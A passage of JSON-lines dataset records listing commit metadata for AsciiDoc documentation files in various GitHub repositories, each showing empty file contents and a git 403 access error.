<4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\n","repos":"helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2054ae89c2e8217e655c71a1f83b38947fa438d","subject":"[docs] minor cleanup on multi-master migration doc","message":"[docs] minor cleanup on multi-master migration doc\n\nmaster_data_dirs --> master_data_dir in the list of arguments for\nthe kudu CLI too to be consistent with the description of those.\n\nChange-Id: I88e724a9d27e4e08610e6941b613ba13faa4c5ec\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11458\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ed4aacfcb476b0ef7daf658a8b790eb3cddfb4b","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbb5531cdfc72259813303e439ba7bff5746d65a","subject":"Publish 2016-10-08.adoc","message":"Publish 2016-10-08.adoc","repos":"jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study","old_file":"2016-10-08.adoc","new_file":"2016-10-08.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjmean2\/server-study.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0726e35d8847fc1b7c3963b3bef05f5eb026b80","subject":"write(promise-library): Promise\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0","message":"write(promise-library): Promise\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0\n\nPolyfill \u3068 \u62e1\u5f35\u30e9\u30a4\u30d6\u30e9\u30ea\u306e 2\u30b8\u30e3\u30f3\u30eb\n","repos":"liyunsheng\/promises-book,oToUC\/promises-book,genie88\/promises-book,sunfurong\/promise,azu\/promises-book,liyunsheng\/promises-book,genie88\/promises-book,mzbac\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,genie88\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,wenber\/promises-book,dieface\/promises-book,liubin\/promises-book,sunfurong\/promise,tangjinzhou\/promises-book,charlenopires\/promises-book,dieface\/promises-book,mzbac\/promises-book,xifeiwu\/promises-book,azu\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,cqricky\/promises-book,liubin\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,purepennons\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,azu\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,cqricky\/promises-book,azu\/promises-book,sunfurong\/promise","old_file":"Ch4_AdvancedPromises\/promise-library.adoc","new_file":"Ch4_AdvancedPromises\/promise-library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6f0121eabee1c4c4b6c66b403359f606562cd5e","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62189d7c45ca8716da74b68f3eba7663684bfe5e","subject":"Add int","message":"Add int\n","repos":"leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11652_enforce_jdk_8\/11652_enforce_jdk_8.int.adoc","new_file":"doc-bridgepoint\/notes\/11652_enforce_jdk_8\/11652_enforce_jdk_8.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4afdec5c351d321e3de47b027938c412f6edddb9","subject":"Update 2015-10-25-Middleman.adoc","message":"Update 2015-10-25-Middleman.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Middleman.adoc","new_file":"_posts\/2015-10-25-Middleman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a13d59820bf215232c12a34c1e0bef9e31fb04d","subject":"Use correct version number for inputs tool","message":"Use correct version number for inputs tool","repos":"ninja-build\/ninja,ninja-build\/ninja,AoD314\/ninja,AoD314\/ninja,ninja-build\/ninja,AoD314\/ninja,ninja-build\/ninja,AoD314\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AoD314\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"112f85e1536b82d5f0bd84ceea5df4634151dfa9","subject":"Fix typo","message":"Fix typo\n","repos":"ninja-build\/ninja,ninja-build\/ninja,maruel\/ninja,AoD314\/ninja,maruel\/ninja,AoD314\/ninja,AoD314\/ninja,ninja-build\/ninja,ninja-build\/ninja,maruel\/ninja,maruel\/ninja,AoD314\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AoD314\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd686075eee42641774b198c180d87ace7602c23","subject":"y2b create post JACK'S FAVORITE MOMENTS MONTAGE","message":"y2b create post JACK'S FAVORITE MOMENTS MONTAGE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-23-JACKS-FAVORITE-MOMENTS-MONTAGE.adoc","new_file":"_posts\/2016-06-23-JACKS-FAVORITE-MOMENTS-MONTAGE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2140dcc04e447a13f480a0aea79b9b20fc0983d3","subject":"JSON RPC API protocol is poorly structured","message":"JSON RPC API protocol is poorly structured\n\nAdd the structure and examples.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c84239ccd992b393e4d6716233aea722b0f3e2e9","subject":"Lack of chain selection for most JSON-RPC methods","message":"Lack of chain selection for most JSON-RPC methods\n\nExpend their with additional optional parameters `chain` and `chain_id`.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3215360bd7ab04148e2f70358a1288cfaf29dca4","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4bf1ca110733fcbf4fdafe414087f1c34eed685","subject":"Update 2017-10-06-Linux-Basics-Creating-a-Wireless-Wireless-Adapter.adoc","message":"Update 2017-10-06-Linux-Basics-Creating-a-Wireless-Wireless-Adapter.adoc","repos":"ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io","old_file":"_posts\/2017-10-06-Linux-Basics-Creating-a-Wireless-Wireless-Adapter.adoc","new_file":"_posts\/2017-10-06-Linux-Basics-Creating-a-Wireless-Wireless-Adapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ntfnd\/ntfnd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87ca98f0be75dcdb76329af74e3f106d71a8d2c6","subject":"Update 2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","message":"Update 2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","new_file":"_posts\/2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a49fd25b21b9a2c7fb129b0430c4d89fa6082520","subject":"Update 2017-06-07-Episode-102-Trololo.adoc","message":"Update 2017-06-07-Episode-102-Trololo.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-06-07-Episode-102-Trololo.adoc","new_file":"_posts\/2017-06-07-Episode-102-Trololo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"702e270dbdaa1fd3324beb8d42a7b189025bd36b","subject":"Create JolokiaBeanMonitor.adoc","message":"Create JolokiaBeanMonitor.adoc","repos":"aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/JolokiaBeanMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/JolokiaBeanMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"8a829330bb610c59cc55f06a4f5e12ca0eedb5d3","subject":"fix typo","message":"fix typo\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e72706347305c601a330f7389198071944b29dd","subject":"Update 2016-02-04-Alex-intime-details.adoc","message":"Update 2016-02-04-Alex-intime-details.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Alex-intime-details.adoc","new_file":"_posts\/2016-02-04-Alex-intime-details.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3cebde970198eb01a5d40123581a3b030ee474a","subject":"Update 2019-01-31-classes-and-objects.adoc","message":"Update 2019-01-31-classes-and-objects.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-classes-and-objects.adoc","new_file":"_posts\/2019-01-31-classes-and-objects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e280ce1a3eafb9518af7147439e9f46d5d654e31","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d1cde99e16f7af1be5e64f17f469f4a1cfb58cd","subject":"I think it's finally working.","message":"I think it's finally working.\n","repos":"hypatia-software-org\/hypatia-engine,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,brechin\/hypatia,brechin\/hypatia,Applemann\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"256393b09b9e6ab27c924888c2fcb172e7ad82b1","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eda4d80fcc88cf5a5adf072ff93689f845c49ab","subject":"Add basic docs on secondaries","message":"Add basic docs on secondaries\n\nChange-Id: I32a304ad568898e2c21b688e67e58e869c7fc761\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/linux-secondaries.adoc","new_file":"docs\/linux-secondaries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"cd1d58c02b35feded1a7485309cea992ed38dfd5","subject":"Add Bakery link to the documentation.","message":"Add Bakery link to the documentation.\n\n","repos":"Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/tutorial.adoc","new_file":"documentation\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0100ea3f189e0ff56b5780d07e1dac159f57245","subject":"Update logging documentation to include Log4j 2","message":"Update logging documentation to include Log4j 2\n\nThis also updates the version numbers provided in the sample pom.xml\nsnippets for configuring logging for SLF4J and Log4j 1.x. A sample\nlog4j2.xml file is also given with the same configuration as\ndemonstrated in the log4j.properties example. The link to the Log4j 1.x\nsite has been fixed to point to the 1.2 URL (do note that Log4j 1.2 is\nend of life and is not compatible with JDK 9+).\n\nSee gh-1279\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/overview.adoc","new_file":"src\/asciidoc\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4063c17d3f74e7015b5a68cb3b8a9cf7f61f0824","subject":"Publish 2017-02-25adoc.adoc","message":"Publish 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7e1781694190e82cacc93d712271f9c221a9cb8","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74d896f355f6fa804b82e4a200aa1165ba37cb35","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef8609f3560b0dcac98e4afb7be8457f0b4b781a","subject":"adder release notes for 1.21.0","message":"adder release notes for 1.21.0","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"releasenotes_1.21.0.adoc","new_file":"releasenotes_1.21.0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appNG\/appng.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"446799e701cc11e8ade5e6f3e40190b091f70e42","subject":"Update 2015-10-07-phpconf2015_impression.adoc","message":"Update 2015-10-07-phpconf2015_impression.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-10-07-phpconf2015_impression.adoc","new_file":"_posts\/2015-10-07-phpconf2015_impression.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46faf4854351596f1ec02206fffa4ac0a747a71f","subject":"jpa criteria blog post","message":"jpa criteria blog post\n","repos":"codylerum\/outjected.com,codylerum\/outjected.com","old_file":"blog\/2013-08-08-embrace-the-jpa-2-criteria-api.asciidoc","new_file":"blog\/2013-08-08-embrace-the-jpa-2-criteria-api.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codylerum\/outjected.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61480665a4858aaa029dff04a789b4f574fcad14","subject":"Link to view","message":"Link to view\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Class path\/README.adoc","new_file":"Class path\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"431e458e41df4bdfd02fbc7370fc72efde7fe4e4","subject":"Create SUMMARY.adoc","message":"Create SUMMARY.adoc","repos":"NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io","old_file":"SUMMARY.adoc","new_file":"SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"effa55cf829f17ee16e2053c21f0a4eddc4db193","subject":"Update 2015-08-28-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","message":"Update 2015-08-28-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-28-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_file":"_posts\/2015-08-28-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96d9914dc5e1ebc1f400b3cf4336fa2d63077c1e","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cf2bdf9d2de1d861bf823a58d50942e12fca663","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f7b5b098b14630a35a27f30a9e68f3ef2efa417","subject":"Update CHANGELOG","message":"Update 